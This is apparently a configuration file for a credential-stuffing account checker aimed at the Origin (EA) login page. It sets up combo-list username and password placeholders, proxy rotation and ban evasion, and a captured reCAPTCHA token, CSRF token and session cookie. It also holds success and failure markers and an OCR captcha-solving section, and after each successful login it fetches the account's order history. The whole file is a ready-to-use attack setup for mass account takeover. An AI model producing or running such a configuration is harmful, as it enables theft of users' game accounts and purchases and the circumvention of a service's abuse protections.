[Wordlist]
[Settings]
SiteURL=https://www.origin.com/login
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
ComboMode=0
EmailFilter=0
EmailMode=0
UsernameStart=6
UsernameEnd=8
InvalidChars=&
AllowedChars=
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordStart=6
PasswordEnd=8
PasswordInvalidChars=
PasswordAllowedChars=
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowRatio=10
BanWindowProxies=10
blnNoProxies=0
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://www.origin.com|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive| 
RequestMethod=2
Referer=1
POSTData=oauthbasiclogin%5Bemail%5D=<USER>&oauthbasiclogin%5Bpassword%5D=<PASS>&recaptcha_challenge_field=03AHJ_VuuWvTXzjrAGdQLX_dp3n5qSby0At9cwuaFIoGYc??x0Xmj8Ihz7nwSX9iXKQw8lNmg6HlmrSzcJFzqE-W2cl4kNK8u9o26V7DK8FVlQR8tYDYihWzTc1TknK1R9KRv0OSIzxWyY2qghvONsOpTBxXyhb3aNJeWmR??9FjyZ2L7QS6Yzab0VH2w&recaptcha_response_field=manual_challenge&oauthbasiclogin%5B_csrf_token%5D=2c88be67ecf61989ac30bfa939480ee2&oauthbasiclogin%5Bfacebook-auth%5D=&oauthbasiclogin%5Bfacebook-id%5D=&oauthbasiclogin%5Bpsn-session-id%5D=&oauthbasiclogin%5Bcancel%5D=

[Fake]
AfterFP=1
blnSuccess=0
SuccessRetries=3
blnProcessErrors=0
blnCompleteNot=1
EnableConHits=0
ConHits=0
FollowRedirect=0
EnableConLength=0
ConLength=-1
SourceTags=1
UserField=0
HTTPFollow=1
blnForbToOK=0
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3

[Keywords]
EnableHeaderSuccess=1
EnableHeaderBan=0
EnableHeaderFail=0
EnableHeaderRetry=0
HeaderSuccess=<FIELD:LOCATION>||https://accounts.ea.com/connect/auth?client_id=customer_portal#26response_type=code%2326redirect_uri=https%3A%2F%2Faccount.origin.com%2Fcp-ui%2Faboutme%2Flogin%2326locale=en_US
HeaderBan=
HeaderFail=
HeaderRetry=
EnableGlobalSourceRetry=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceFail=1
EnableSourceRetry=0
SourceSuccess="userId";>Order #<;successfulLogin' : true
SourceBan=
SourceFail=<span>Your email or password is incorrect.;<NOT>||successfulLogin' : true,;>No orders to display.</
SourceRetry=

[Form]
IAParse=0
LoginPostData=
LoginMethod=1
LoginHeader=0
Action=https://www.origin.com/login
Username=oauthbasiclogin%5Bemail%5D
Password=oauthbasiclogin%5Bpassword%5D
Email=
AddData=recaptcha_challenge_field=03AHJ_VuuWvTXzjrAGdQLX_dp3n5qSby0At9cwuaFIoGYc??x0Xmj8Ihz7nwSX9iXKQw8lNmg6HlmrSzcJFzqE-W2cl4kNK8u9o26V7DK8FVlQR8tYDYihWzTc1TknK1R9KRv0OSIzxWyY2qghvONsOpTBxXyhb3aNJeWmR??9FjyZ2L7QS6Yzab0VH2w&recaptcha_response_field=manual_challenge&oauthbasiclogin%5B_csrf_token%5D=2c88be67ecf61989ac30bfa939480ee2&oauthbasiclogin%5Bfacebook-auth%5D=&oauthbasiclogin%5Bfacebook-id%5D=&oauthbasiclogin%5Bpsn-session-id%5D=&oauthbasiclogin%5Bcancel%5D=
CustomData=
NoIndex=
Cookie=connect-session=0qd8j8qsphva5m9r4386h21g26
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=
RedPostData=
RedKeys=<Source>||My Account
DataDesc=
CaptureParsingCode=
RefreshSession=1
RefreshCookie=1
FormHeader=0
AjaxHeader=0
RedHeader=0
IAMethod=2
POSTMethod=2
RedMethod=1
ImageAfterAjax=0
blnBasic=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1

[Ajax]
Variables=RedURL||Post Action||None||ParsingCode||\n\t\t\t<img src="|"|#00|#00|0|#00|#00|0||None||None||Username||||-1||-1||0||0||0||0
PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&RedURL&&None&&None&&None&&None&&None&&None&&None
RedURL=https://connect.origin.com/ie/ajax/account/order_history

[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnCharTable=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnThreeImages=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng